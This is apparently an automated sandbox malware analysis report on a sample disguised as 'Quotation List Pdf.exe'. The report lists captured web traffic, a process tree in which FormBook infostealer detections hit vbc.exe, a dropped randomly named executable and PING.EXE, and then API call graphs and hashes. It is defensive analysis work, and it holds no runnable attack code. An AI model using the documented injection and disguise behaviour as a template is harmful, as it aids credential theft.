                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                    Jul 1, 2024 15:47:25.634257078 CEST  1236               IN
                                                    Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                    Jul 1, 2024 15:47:25.634268999 CEST  1236               IN
                                                    Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                    Jul 1, 2024 15:47:25.634380102 CEST  1236               IN
                                                    Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                    Jul 1, 2024 15:47:25.634391069 CEST  217                IN         Data Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                    Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Target ID:0
                                                    Start time:09:44:21
                                                    Start date:01/07/2024
                                                    Path:C:\Users\user\Desktop\Quotation List Pdf.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\Quotation List Pdf.exe"
                                                    Imagebase:0x7ff768430000
                                                    File size:2'404'352 bytes
                                                    MD5 hash:9CFD62FC26438EEB8A50922265AD0EA7
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:09:44:21
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:44:22
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):
                                                    Commandline:"C:\Windows\System32\svchost.exe"
                                                    Imagebase:
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:09:44:22
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\regedit.exe
                                                    Wow64 process (32bit):
                                                    Commandline:"C:\Windows\regedit.exe"
                                                    Imagebase:
                                                    File size:370'176 bytes
                                                    MD5 hash:999A30979F6195BF562068639FFC4426
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:5
                                                    Start time:09:44:23
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                    Imagebase:0x4a0000
                                                    File size:2'625'616 bytes
                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:09:44:25
                                                    Start date:01/07/2024
                                                    Path:C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe"
                                                    Imagebase:0xf0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:09:44:26
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\PING.EXE"
                                                    Imagebase:0xc10000
                                                    File size:18'944 bytes
                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:09:44:39
                                                    Start date:01/07/2024
                                                    Path:C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe"
                                                    Imagebase:0xf0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:11
                                                    Start time:09:44:51
                                                    Start date:01/07/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6d20e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:5.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:25.2%
                                                      Total number of Nodes:937
                                                      Total number of Limit Nodes:31
7ff768462d8b 16507 7ff768462d8f 16506->16507 16509 7ff768462dbe 16506->16509 16587 7ff768442ec0 VirtualFree 16507->16587 16509->16513 16549 7ff768475e20 16509->16549 16515 7ff768442e09 16514->16515 16516 7ff768442df1 VirtualFree 16514->16516 16515->16495 16516->16495 16517->16497 16519 7ff76847321f 16518->16519 16520 7ff76847324c 16519->16520 16521 7ff768473242 16519->16521 16526 7ff768473277 16519->16526 16522 7ff768442ee0 3 API calls 16520->16522 16588 7ff768442f60 16521->16588 16525 7ff76847325d 16522->16525 16525->16526 16599 7ff768442ec0 VirtualFree 16525->16599 16526->16500 16530 7ff7684627cf 16528->16530 16531 7ff7684627eb 16530->16531 16600 7ff768442450 16530->16600 16531->16502 16533 7ff768462fb5 16532->16533 16534 7ff768462fb9 16533->16534 16542 7ff768462fd3 16533->16542 16535 7ff76849b490 8 API calls 16534->16535 16536 7ff768462fcb 16535->16536 16536->16506 16537 7ff76846301e EnterCriticalSection 16537->16542 16538 7ff76846305e LeaveCriticalSection 16540 7ff768442e10 3 API calls 16538->16540 16539 7ff768463169 LeaveCriticalSection 16544 7ff7684630af 16539->16544 16547 7ff76846317e 16539->16547 16540->16542 16541 7ff76849b490 8 API calls 16543 7ff768463140 16541->16543 16542->16537 16542->16538 16542->16539 16542->16544 16545 7ff768463148 EnterCriticalSection 16542->16545 16543->16506 16544->16541 16545->16539 16547->16544 16548 7ff7684631a3 EnterCriticalSection LeaveCriticalSection 16547->16548 16607 7ff768442ea0 VirtualFree 16547->16607 16548->16547 16608 7ff768475d60 16549->16608 16552 7ff7684621b0 16555 7ff768462218 16552->16555 16553 7ff768462774 16626 7ff7684422f0 CloseHandle 16553->16626 16554 7ff768462780 16557 7ff768462789 16554->16557 16558 7ff768462795 16554->16558 16585 7ff768462241 16555->16585 16612 7ff768442390 16555->16612 16627 7ff7684422f0 CloseHandle 16557->16627 16558->16513 16561 7ff768462282 16562 7ff768442390 4 API calls 16561->16562 16561->16585 16563 7ff768462298 _swprintf_c_l 16562->16563 16564 7ff768442570 10 API calls 
16563->16564 16563->16585 16565 7ff7684625a6 16564->16565 16566 7ff768442390 4 API calls 16565->16566 16567 7ff76846261e 16566->16567 16568 7ff768462660 16567->16568 16571 7ff768442390 4 API calls 16567->16571 16569 7ff76846272c 16568->16569 16570 7ff768462720 16568->16570 16568->16585 16573 7ff768462735 16569->16573 16574 7ff768462741 16569->16574 16622 7ff7684422f0 CloseHandle 16570->16622 16575 7ff768462634 16571->16575 16623 7ff7684422f0 CloseHandle 16573->16623 16577 7ff76846274a 16574->16577 16578 7ff768462756 16574->16578 16575->16568 16617 7ff768442310 16575->16617 16624 7ff7684422f0 CloseHandle 16577->16624 16580 7ff76846275f 16578->16580 16578->16585 16625 7ff7684422f0 CloseHandle 16580->16625 16583 7ff76846264a 16583->16568 16584 7ff768442390 4 API calls 16583->16584 16584->16568 16585->16553 16585->16554 16586 7ff7684626ff 16585->16586 16586->16513 16587->16513 16589 7ff768442f8e LookupPrivilegeValueW 16588->16589 16590 7ff768443026 GetLargePageMinimum 16588->16590 16591 7ff768442faa GetCurrentProcess OpenProcessToken 16589->16591 16592 7ff76844305f 16589->16592 16593 7ff768443046 VirtualAlloc 16590->16593 16594 7ff768443063 GetCurrentProcess VirtualAllocExNuma 16590->16594 16591->16592 16595 7ff768442fe1 AdjustTokenPrivileges GetLastError CloseHandle 16591->16595 16597 7ff76849b490 8 API calls 16592->16597 16593->16592 16594->16592 16595->16592 16596 7ff76844301b 16595->16596 16596->16590 16596->16592 16598 7ff768443096 16597->16598 16598->16525 16599->16526 16601 7ff768442458 16600->16601 16602 7ff768442471 GetLogicalProcessorInformation 16601->16602 16605 7ff76844249d 16601->16605 16603 7ff768442492 GetLastError 16602->16603 16604 7ff7684424a4 16602->16604 16603->16604 16603->16605 16604->16605 16606 7ff7684424e1 GetLogicalProcessorInformation 16604->16606 16605->16531 16606->16605 16607->16547 16609 7ff768475d79 16608->16609 16611 7ff768462f32 16608->16611 16610 7ff768475d90 GetEnabledXStateFeatures 16609->16610 16609->16611 16610->16611 
16611->16552 16613 7ff76849b4b0 _swprintf_c_l 3 API calls 16612->16613 16614 7ff7684423b6 16613->16614 16615 7ff7684423be CreateEventW 16614->16615 16616 7ff7684423e0 16614->16616 16615->16616 16616->16561 16618 7ff76849b4b0 _swprintf_c_l 3 API calls 16617->16618 16619 7ff768442336 16618->16619 16620 7ff76844233e CreateEventW 16619->16620 16621 7ff76844235e 16619->16621 16620->16621 16621->16583 16622->16569 16623->16574 16624->16578 16625->16585 16626->16554 16627->16558 16628 7ff76844b740 16629 7ff76844b74b 16628->16629 16630 7ff76844b750 16629->16630 16637 7ff76843df20 16629->16637 16632 7ff76844b789 16633 7ff768442750 14 API calls 16632->16633 16634 7ff76844b7db 16633->16634 16635 7ff768444a40 18 API calls 16634->16635 16636 7ff76844b7e7 16635->16636 16638 7ff76843df2d 16637->16638 16641 7ff768437f30 16638->16641 16642 7ff768437f72 16641->16642 16643 7ff768437f96 FlushProcessWriteBuffers 16642->16643 16645 7ff768437fb3 16643->16645 16644 7ff768438099 16645->16644 16647 7ff768438029 SwitchToThread 16645->16647 16648 7ff768433000 16645->16648 16647->16645 16649 7ff768433027 16648->16649 16650 7ff768433007 16648->16650 16649->16645 16650->16649 16651 7ff76843cef1 LoadLibraryExW GetProcAddress 16650->16651 16664 7ff76843cff4 16650->16664 16653 7ff76843cfdd GetProcAddress 16651->16653 16654 7ff76843cf25 GetCurrentProcess 16651->16654 16652 7ff76843d055 SuspendThread 16655 7ff76843d0b9 16652->16655 16656 7ff76843d063 GetThreadContext 16652->16656 16653->16664 16661 7ff76843cf3a _swprintf_c_l 16654->16661 16659 7ff76849b490 8 API calls 16655->16659 16657 7ff76843d0b0 ResumeThread 16656->16657 16658 7ff76843d083 16656->16658 16657->16655 16658->16657 16660 7ff76843d0c9 16659->16660 16660->16645 16661->16653 16662 7ff76843cf71 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 16661->16662 16662->16653 16663 7ff76843d049 16662->16663 16663->16652 16663->16655 16664->16652 16664->16655 16665 7ff76843d03e GetLastError 16664->16665 16665->16663 
16666 7ff76844eb61 16668 7ff76844eb80 16666->16668 16669 7ff76844ebe2 16668->16669 16690 7ff768467bb0 16668->16690 16678 7ff76844eb22 16669->16678 16681 7ff76844f800 16669->16681 16671 7ff76844ed04 16673 7ff76844f1b0 3 API calls 16671->16673 16672 7ff76844ec2f 16673->16678 16674 7ff76844ec69 16675 7ff7684734a0 14 API calls 16674->16675 16680 7ff76844ecb8 16674->16680 16676 7ff76844ec9b 16675->16676 16676->16678 16679 7ff768467bb0 GetTickCount64 16676->16679 16676->16680 16677 7ff768473570 WaitForSingleObject 16677->16678 16678->16672 16678->16677 16679->16680 16680->16669 16680->16671 16680->16678 16682 7ff76844f842 16681->16682 16683 7ff76844f927 16682->16683 16684 7ff76844f8d6 16682->16684 16689 7ff76844f915 16682->16689 16685 7ff768448800 WaitForSingleObject 16683->16685 16683->16689 16686 7ff76844f8e5 SwitchToThread 16684->16686 16687 7ff76844f8f3 16685->16687 16686->16687 16688 7ff76845c550 3 API calls 16687->16688 16687->16689 16688->16689 16689->16678 16691 7ff768467bf2 16690->16691 16692 7ff768467bce 16690->16692 16691->16692 16693 7ff768467c16 GetTickCount64 16691->16693 16692->16674 16693->16692 16694 7ff768467c31 16693->16694 16694->16692

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442B9F
                                                      • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442BDD
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C09
                                                      • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C1A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C29
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442CC0
                                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF768442CD3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                      • String ID:
                                                      • API String ID: 580471860-0
                                                      • Opcode ID: 4c9e7b62ca1d93063124db9da2326d3f3828c88f021132ba50495a9616bc8b52
                                                      • Instruction ID: 9b8183c0ac17ebb9f1092c45e70aefac21c1a0cb1ba1fe872e6c4ad06264c2c7
                                                      • Opcode Fuzzy Hash: 4c9e7b62ca1d93063124db9da2326d3f3828c88f021132ba50495a9616bc8b52
                                                      • Instruction Fuzzy Hash: 04519171A08BA6C6EB50AF19E4401B9E7A2FF58744FC80035D94D87366EF3DE509CB68

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00007FF76843D0F0: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF76843813F,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843D0FB
                                                        • Part of subcall function 00007FF76843D0F0: QueryInformationJobObject.KERNEL32 ref: 00007FF76843D1CE
                                                        • Part of subcall function 00007FF76843CE80: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF768438168,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843CE91
                                                      • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7684381C9
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF768432000), ref: 00007FF7684382B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
                                                      • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                                                      • API String ID: 2052584837-2841289747
                                                      • Opcode ID: d0ac9821fb6c0add4b9ebbe98daa48ccbd8c985c351c2d863065a78766f66ba6
                                                      • Instruction ID: febf591ca18e350b6a8e7ed39aaaa972fe4a62643aecd3aa2a183da4e24ab41e
                                                      • Opcode Fuzzy Hash: d0ac9821fb6c0add4b9ebbe98daa48ccbd8c985c351c2d863065a78766f66ba6
                                                      • Instruction Fuzzy Hash: EE415F21A4CA42C2FA11BF62D5012B9EBA1AF517C4FC84131E94D5769BDF2CE445C738

                                                      Control-flow Graph

                                                      APIs
                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF76849B4B9,?,?,?,?,00007FF76843E7A1,?,?,?,00007FF76843ED24,00000000,00000020,?), ref: 00007FF76849BDBE
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF76849BDD4
                                                        • Part of subcall function 00007FF76849C204: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF76849C20D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                      • String ID:
                                                      • API String ID: 205171174-0
                                                      • Opcode ID: bf961b2ab8b72b6bb4696f625dc9e1acb4f646454a2333270e2ccd61e10cc9a7
                                                      • Instruction ID: 43339a78c9b76254aa364f94c67f0d0a281cae461dd6d937c03de9553434fa9c
                                                      • Opcode Fuzzy Hash: bf961b2ab8b72b6bb4696f625dc9e1acb4f646454a2333270e2ccd61e10cc9a7
                                                      • Instruction Fuzzy Hash: F981E971E08602C9FB24AF69A841A74FBE1FF08364F804739D56E8B7D5DE3D58408768
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentProcess
                                                      • String ID:
                                                      • API String ID: 2050909247-0
                                                      • Opcode ID: 08012919a8b1b8081b4c713736aa929bcbe064cfab43f142deed8e71929d45e1
                                                      • Instruction ID: c9b1d92edb7ac43e3cfec853ab7dbbd8af93a130d2268a4c4fef38d57e95f3dd
                                                      • Opcode Fuzzy Hash: 08012919a8b1b8081b4c713736aa929bcbe064cfab43f142deed8e71929d45e1
                                                      • Instruction Fuzzy Hash: BF02A3B1E08686C6F615AF25A841638FBA3BF55784F84463AD50E33262DF3DB4C1C678
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1114855c8192a3a17f8c3631f55f4fa67d8beb613ff41ef3d3edadf3381c0416
                                                      • Instruction ID: 2d7b9834e87226e0f9df184df43f90b04332f8f152e4b588199fc58a2ac2eb46
                                                      • Opcode Fuzzy Hash: 1114855c8192a3a17f8c3631f55f4fa67d8beb613ff41ef3d3edadf3381c0416
                                                      • Instruction Fuzzy Hash: A9F1B021D1DB53C6F651FF20A9116B5E753AF99780FC88336E40D612A3EF2CB4D482A8

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                      • String ID: @$@$@
                                                      • API String ID: 2645093340-1177533131
                                                      • Opcode ID: 46198da623394d7b15bb719f5e4a5128e58e6380a5aeb4f160e59a8db540b038
                                                      • Instruction ID: 81f60e80041592d851dd913ecba34a542d4ff8618e3a2bc76a7d96fcea8f9e94
                                                      • Opcode Fuzzy Hash: 46198da623394d7b15bb719f5e4a5128e58e6380a5aeb4f160e59a8db540b038
                                                      • Instruction Fuzzy Hash: A1414231608AD1C5EB719F11E4043A9F760FF88B60F884335DAAD87A99DF7CD4488B15

                                                      Control-flow Graph

                                                      APIs
